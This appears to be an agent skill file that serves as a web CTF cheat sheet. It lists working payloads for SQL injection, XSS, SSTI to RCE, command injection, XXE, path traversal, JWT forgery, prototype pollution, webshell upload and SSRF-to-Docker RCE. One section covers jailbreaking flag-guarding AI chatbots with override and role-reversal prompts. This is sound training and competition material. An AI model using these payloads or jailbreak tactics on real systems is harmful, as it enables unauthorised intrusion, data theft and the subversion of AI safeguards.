name: ctf-web description: Provides web exploitation techniques for CTF challenges. Use when solving web security challenges involving XSS, SQLi, SSTI, SSRF, CSRF, XXE, file upload bypasses, JWT attacks, prototype pollution, path traversal, command injection, request smuggling, DOM clobbering, Web3/blockchain, or authentication bypass. license: MIT compatibility: Requires filesystem-based agent (Claude Code or similar) with bash, Python 3, and internet access for tool installation. allowed-tools: Bash Read Write Edit Glob Grep Task WebFetch WebSearch metadata: user-invocable: "false"

CTF Web Exploitation

Quick reference for web CTF challenges. Each technique has a one-liner here; see supporting files for full details with payloads and code.

Additional Resources

server-side.md - Core server-side injection attacks: SQLi, SSTI, SSRF, XXE, command injection, code injection (Ruby/Perl/Python), ReDoS, file upload→RCE, eval bypass, PHP type juggling, PHP file inclusion / php://filter, SSTI __dict__.update() quote bypass, ERB SSTI Sequel bypass, Thymeleaf SpEL SSTI + Spring FileCopyUtils WAF bypass
server-side-advanced.md - Advanced server-side techniques: ExifTool CVE-2021-22204, Go rune/byte mismatch, zip symlink traversal, path traversal bypasses (brace stripping, double URL encoding, os.path.join, %2f), Flask/Werkzeug debug mode, XXE external DTD filter bypass, WeasyPrint SSRF, MongoDB regex injection, Pongo2 Go template injection, ZIP PHP webshell, basename() bypass, React Server Components Flight RCE (CVE-2025-55182), SSRF→Docker API RCE chain
client-side.md - Client-side attacks: XSS, CSRF, CSPT, cache poisoning, DOM tricks, React input filling, hidden elements, XS-Leak timing oracle, GraphQL CSRF, Unicode case folding XSS bypass (long-s U+017F), CSS font glyph container query exfiltration, Hyperscript CDN CSP bypass, PBKDF2 prefix timing oracle
auth-and-access.md - Auth/authz attacks: JWT, session, password inference, weak validation, client-side gates, NoSQL auth bypass, OAuth/OIDC exploitation (redirect_uri bypass, token manipulation, state CSRF), CORS misconfiguration
node-and-prototype.md - Node.js: prototype pollution, VM sandbox escape, Happy-DOM chain, flatnest CVE, Lodash+Pug AST injection
web3.md - Blockchain/Web3: Solidity exploits, proxy patterns, ABI encoding tricks, transient storage clearing collision (0.8.28-0.8.33), Foundry tooling
cves.md - CVE-specific exploits: Next.js middleware bypass, curl credential leak, Uvicorn CRLF, urllib scheme bypass, ExifTool DjVu, broken auth, AAEncode/JJEncode, protocol multiplexing, React Server Components Flight RCE (CVE-2025-55182)

Reconnaissance

View source for HTML comments, check JS/CSS files for internal APIs
Look for .map source map files
Check response headers for custom X- headers and auth hints
Common paths: /robots.txt, /sitemap.xml, /.well-known/, /admin, /api, /debug, /.git/, /.env
Search JS bundles: grep -oE '"/api/[^"]+"' for hidden endpoints
Check for client-side validation that can be bypassed
Compare what the UI sends vs. what the API accepts (read JS bundle for all fields)
Check assets returning 404 status — favicon.ico, robots.txt may contain data despite error codes: strings favicon.ico | grep -i flag
Tor hidden services: feroxbuster -u 'http://target.onion/' -w wordlist.txt --proxy socks5h://127.0.0.1:9050 -t 10 -x .txt,.html,.bak

SQL Injection Quick Reference

Detection: Send ' — syntax error indicates SQLi

' OR '1'='1                    # Classic auth bypass
' OR 1=1--                     # Comment termination
username=\&password= OR 1=1--  # Backslash escape quote bypass
' UNION SELECT sql,2,3 FROM sqlite_master--  # SQLite schema
0x6d656f77                     # Hex encoding for 'meow' (bypass quotes)

XML entity encoding: UNION → UNION after XML parser decodes, bypasses WAF keyword filters.

See server-side.md for second-order SQLi, LIKE brute-force, SQLi→SSTI chains, XML entity WAF bypass.

XSS Quick Reference

<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>

Filter bypass: hex \x3cscript\x3e, entities <script>, case mixing <ScRiPt>, event handlers.

See client-side.md for DOMPurify bypass, cache poisoning, CSPT, React input tricks.

Path Traversal / LFI Quick Reference

../../../etc/passwd
....//....//....//etc/passwd     # Filter bypass
..%2f..%2f..%2fetc/passwd        # URL encoding
%252e%252e%252f                  # Double URL encoding
{.}{.}/flag.txt                  # Brace stripping bypass

Python footgun: os.path.join('/app/public', '/etc/passwd') returns /etc/passwd

JWT Quick Reference

alg: none — remove signature entirely
Algorithm confusion (RS256→HS256) — sign with public key
Weak secret — brute force with hashcat/flask-unsign
Key exposure — check /api/getPublicKey, .env, /debug/config
Balance replay — save JWT, spend, replay old JWT, return items for profit
Unverified signature — modify payload, keep original signature
JWK header injection — embed attacker public key in token header
JKU header injection — point to attacker-controlled JWKS URL
KID path traversal — ../../../dev/null for empty key, or SQL injection in KID

See auth-and-access.md for full JWT attacks and session manipulation.

SSTI Quick Reference

Detection: {{7*7}} returns 49

# Jinja2 RCE
{{self.__init__.__globals__.__builtins__.__import__('os').popen('id').read()}}
# Go template
{{.ReadFile "/flag.txt"}}
# EJS
<%- global.process.mainModule.require('child_process').execSync('id') %>
# Jinja2 quote bypass (keyword args):
{{obj.__dict__.update(attr=value) or obj.name}}

Quote filter bypass: Use __dict__.update(key=value) — keyword arguments need no quotes. See server-side.md.

ERB SSTI (Ruby/Sinatra): <%= Sequel::DATABASES.first[:table].all %> bypasses ERBSandbox variable-name restrictions via the global Sequel::DATABASES array. See server-side.md.

Thymeleaf SpEL SSTI (Java/Spring): ${T(org.springframework.util.FileCopyUtils).copyToByteArray(new java.io.File("/flag.txt"))} reads files via Spring utility classes when standard I/O is WAF-blocked. Works in distroless containers (no shell). See server-side.md.

SSRF Quick Reference

127.0.0.1, localhost, 127.1, 0.0.0.0, [::1]
127.0.0.1.nip.io, 2130706433, 0x7f000001

DNS rebinding for TOCTOU: https://lock.cmpxchg8b.com/rebinder.html

Command Injection Quick Reference

; id          | id          `id`          $(id)
%0aid         # Newline     127.0.0.1%0acat /flag

When cat/head blocked: sed -n p flag.txt, awk '{print}', tac flag.txt

XXE Quick Reference

<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root>

PHP filter: <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/flag.txt">

PHP Type Juggling Quick Reference

Loose == performs type coercion: 0 == "string" is true, "0e123" == "0e456" is true (magic hashes). Send JSON integer 0 to bypass string password checks. strcmp([], "str") returns NULL which passes !strcmp(). Use === for defense.

See server-side.md for comparison table and exploit payloads.

PHP File Inclusion / LFI Quick Reference

php://filter/convert.base64-encode/resource=config leaks PHP source code without execution. Common LFI targets: /etc/passwd, /proc/self/environ, app config files. Null byte (%00) truncates .php suffix on PHP < 5.3.4.

See server-side.md for filter chains and RCE techniques.

Code Injection Quick Reference

Ruby instance_eval: Break string + comment: VALID');INJECTED_CODE# Perl open(): 2-arg open allows pipe: |command| JS eval blocklist bypass: row['con'+'structor']['con'+'structor']('return this')() PHP deserialization: Craft serialized object in cookie → LFI/RCE

See server-side.md for full payloads and bypass techniques.

Node.js Quick Reference

Prototype pollution: {"__proto__": {"isAdmin": true}} or flatnest circular ref bypass VM escape: this.constructor.constructor("return process")() → RCE Full chain: pollution → enable JS eval in Happy-DOM → VM escape → RCE

Prototype pollution permission bypass (Server OC, Pragyan 2026):

# When Express.js endpoint checks req.body.isAdmin or similar:
curl -X POST -H 'Content-Type: application/json' \
  -d '{"Path":"value","__proto__":{"isAdmin":true}}' \
  'https://target/endpoint'
# __proto__ pollutes Object.prototype, making isAdmin truthy on all objects

Key insight: Always try __proto__ injection on JSON endpoints, even when the vulnerability seems like something else (race condition, SSRF, etc.).

See node-and-prototype.md for detailed exploitation.

Auth & Access Control Quick Reference

Cookie manipulation: role=admin, isAdmin=true
Public admin-login cookie seeding: check if /admin/login sets reusable admin session cookie
Host header bypass: Host: 127.0.0.1
Hidden endpoints: search JS bundles for /api/internal/, /api/admin/; fuzz with auth cookie for non-/api routes like /internal/*
Client-side gates: window.overrideAccess = true or call API directly
Password inference: profile data + structured ID format → brute-force
Weak signature: check if only first N chars of hash are validated
Affine cipher OTP: only 312 possible values (12 mults × 26 adds), brute-force all in seconds
Express.js %2F middleware bypass: /api/export%2Fchat skips app.all("/api/export/chat") middleware; nginx decodes %2F before proxying
IDOR on WIP endpoints: grep for WIP/TODO/debug comments, compare auth decorators against production endpoints

See auth-and-access.md for full patterns.

File Upload → RCE

.htaccess upload: AddType application/x-httpd-php .lol + webshell
Gogs symlink: overwrite .git/config with core.sshCommand RCE
Python .so hijack: write malicious shared object + delete .pyc to force reimport
ZipSlip: symlink in zip for file read, path traversal for file write
Log poisoning: PHP payload in User-Agent + path traversal to include log

See server-side.md for detailed steps.

Multi-Stage Chain Patterns

0xClinic chain: Password inference → path traversal + ReDoS oracle (leak secrets from /proc/1/environ) → CRLF injection (CSP bypass + cache poisoning + XSS) → urllib scheme bypass (SSRF) → .so write via path traversal → RCE

Key chaining insights:

Path traversal + any file-reading primitive → leak /proc/*/environ, /proc/*/cmdline
CRLF in headers → CSP bypass + cache poisoning + XSS in one shot
Arbitrary file write in Python → .so hijacking or .pyc overwrite for RCE
Lowercased response body → use hex escapes (\x3c for <)

Useful Tools

sqlmap -u "http://target/?id=1" --dbs       # SQLi
ffuf -u http://target/FUZZ -w wordlist.txt   # Directory fuzzing
flask-unsign --decode --cookie "eyJ..."      # JWT decode
hashcat -m 16500 jwt.txt wordlist.txt        # JWT crack
dalfox url http://target/?q=test             # XSS

Flask/Werkzeug Debug Mode

Weak session secret brute-force + forge admin session + Werkzeug debugger PIN RCE. See server-side-advanced.md for full attack chain.

XXE with External DTD Filter Bypass

Host malicious DTD externally to bypass upload keyword filters. See server-side-advanced.md for payload and webhook.site setup.

JSFuck Decoding

Remove trailing ()(), eval in Node.js, .toString() reveals original code. See client-side.md.

DOM XSS via jQuery Hashchange (Crypto-Cat)

$(location.hash) + hashchange event → XSS via iframe: <iframe src="https://target/#" onload="this.src+='<img src=x onerror=print()>'">. See client-side.md.

Shadow DOM XSS

Proxy attachShadow to capture closed roots; (0,eval) for scope escape; </script> injection. See client-side.md.

DOM Clobbering + MIME Mismatch

.jpg served as text/html; <form id="config"> clobbers JS globals. See client-side.md.

HTTP Request Smuggling via Cache Proxy

Cache proxy desync for cookie theft via incomplete POST body. See client-side.md.

Path Traversal: URL-Encoded Slash Bypass

%2f bypasses nginx route matching but filesystem resolves it. See server-side-advanced.md.

WeasyPrint SSRF & File Read (CVE-2024-28184)

<a rel="attachment" href="file:///flag.txt"> or <link rel="attachment" href="http://127.0.0.1/admin"> -- WeasyPrint embeds fetched content as PDF attachments, bypassing header checks. Boolean oracle via /Type /EmbeddedFile presence. See server-side-advanced.md and cves.md.

MongoDB Regex / $where Blind Injection

Break out of /.../i with a^/)||(<condition>)&&(/a^. Binary search charCodeAt() for extraction. See server-side-advanced.md.

Pongo2 / Go Template Injection

{% include "/flag.txt" %} in uploaded file + path traversal in template parameter. See server-side-advanced.md.

ZIP Upload with PHP Webshell

Upload ZIP containing .php file → extract to web-accessible dir → file_get_contents('/flag.txt'). See server-side-advanced.md.

basename() Bypass for Hidden Files

basename() only strips dirs, doesn't filter .lock or hidden files in same directory. See server-side-advanced.md.

Custom Linear MAC Forgery

Linear XOR-based signing with secret blocks → recover from known pairs → forge for target. See auth-and-access.md.

CSS/JS Paywall Bypass

Content behind CSS overlay (position: fixed; z-index: 99999) is still in the raw HTML. curl or view-source bypasses it instantly. See client-side.md.

SSRF → Docker API RCE Chain

SSRF to unauthenticated Docker daemon on port 2375. Use /archive for file extraction, /exec + /exec/{id}/start for command execution. Chain through internal POST relay when SSRF is GET-only. See server-side-advanced.md.

HTTP TRACE Method Bypass

Endpoints returning 403 on GET/POST may respond to TRACE, PUT, PATCH, or DELETE. Test with curl -X TRACE. See auth-and-access.md.

LLM/AI Chatbot Jailbreak

AI chatbots guarding flags can be bypassed with system override prompts, role-reversal, or instruction leak requests. Rotate session IDs and escalate prompt severity. See auth-and-access.md.

Admin Bot javascript: URL Scheme Bypass

new URL() validates syntax only, not protocol — javascript: URLs pass and execute in Puppeteer's authenticated context. CSP/SRI on the target page are irrelevant since JS runs in navigation context. See client-side.md.

XS-Leak via Image Load Timing + GraphQL CSRF (HTB GrandMonty)

HTML injection → meta refresh redirect (CSP bypass) → admin bot loads attacker page → JavaScript makes cross-origin GET requests to localhost GraphQL endpoint via new Image().src → measures time-based SQLi (SLEEP(1)) through image error timing → character-by-character flag exfiltration. GraphQL GET requests bypass CORS preflight. See client-side.md.

React Server Components Flight Protocol RCE (Ehax 2026)

Identify via Next-Action + Accept: text/x-component headers. CVE-2025-55182: fake Flight chunk exploits constructor chain for server-side JS execution. Exfiltrate via NEXT_REDIRECT error → x-action-redirect header. WAF bypass: 'chi'+'ld_pro'+'cess' or hex '\x63\x68\x69\x6c\x64\x5f\x70\x72\x6f\x63\x65\x73\x73'. See server-side-advanced.md and cves.md.

Unicode Case Folding XSS Bypass (UNbreakable 2026)

Pattern: Sanitizer regex uses ASCII-only matching (<\s*script), but downstream processing applies Unicode case folding (strings.EqualFold). <ſcript> (U+017F Latin Long S) bypasses regex but folds to <script>. Other pairs: ı→i, K (U+212A)→k. See client-side.md.

CSS Font Glyph + Container Query Data Exfiltration (UNbreakable 2026)

Pattern: Exfiltrate inline text via CSS injection (no JS). Custom font assigns unique glyph widths per character. Container queries match width ranges to fire background-image requests — one request per character. Works under strict CSP. See client-side.md.

Hyperscript / Alpine.js CDN CSP Bypass (UNbreakable 2026)

Pattern: CSP allows cdnjs.cloudflare.com. Load Hyperscript (_= attributes) or Alpine.js (x-data, x-init) from CDN — they execute code from HTML attributes that sanitizers don't strip. See client-side.md.

Solidity Transient Storage Clearing Collision (0.8.28-0.8.33)

Pattern: Solidity IR pipeline (--via-ir) generates identically-named Yul helpers for delete on persistent and transient variables of the same type. One uses sstore, the other should use tstore, but deduplication picks only one. Exploits: overwrite owner (slot 0) via transient delete, or make persistent delete (revoke approvals) ineffective. Workaround: use _lock = address(0) instead of delete _lock. See web3.md.

Common Flag Locations

/flag.txt, /flag, /app/flag.txt, /home/*/flag*
Environment variables: /proc/self/environ
Database: flag, flags, secret tables
Response headers: x-flag, x-archive-tag, x-proof
Hidden DOM: display:none elements, data attributes

ctf-web

Before / After 效果对比

description 文档